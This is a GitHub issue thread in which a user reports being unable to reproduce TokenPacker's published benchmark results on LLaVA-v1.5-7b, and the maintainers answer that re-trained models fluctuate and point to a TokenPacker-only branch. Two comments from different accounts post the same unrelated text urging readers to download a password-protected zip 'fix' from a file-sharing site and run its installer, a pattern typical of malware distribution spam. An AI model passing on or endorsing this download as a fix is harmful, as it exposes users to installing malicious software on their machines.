### ISSUE TITLE
Unable to reproduce benchmark results on LLaVA-v1.5-7b

### ISSUE THREAD

**Issue by ZQ1102118381** [CircleRadon/TokenPacker#11]
Hi,

Thank you for your nice work.

I have a trouble in replicating the benchmark result like this:

<img width="882" alt="benchmarks" src="https://github.com/user-attachments/assets/23b267da-f072-4fef-b260-aeb2e5d17444">

- "paper-Tokenpacker" is the papers result
- "open-checkpoint"  uses the checkpoint of [TokenPacker-7b](https://huggingface.co/sunshine-lwt/TokenPacker-7b-144token/tree/main) 
- “ours" means reproduce result.

We trained with 8 A100, However, the evaluation results on other datasets seem reasonable.  

I used the same details as in the provided code.

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by typ1012** [comment]
We encountered the same problem.

**Comment by LiWentomng** [comment]
@ZQ1102118381 @typ1012 
Thanks for pointing out this issue. The current code combines the patch slicing and tokenpacker, which may lead to some errors for  the only original tokenpacker. We will carefully review the code.

**Comment by LiWentomng** [comment]
@ZQ1102118381 @typ1012 
We carefully review our codes, and everything appears to be well.  We re-train models with the same codes, we noticed some fluctuations in performance. We listed the model performance we have re-trained for reference.


![image](https://github.com/user-attachments/assets/635859bd-f4dd-4a85-8a88-891e566ecfe2)



Additionally, we have provided a [branch](https://github.com/CircleRadon/TokenPacker/tree/llava-tokenpacker) that only contains  TokenPacker as a projector based on LLaVA-1.5. This branch does not include  patch slicing scheme for TokenPacker-HD.
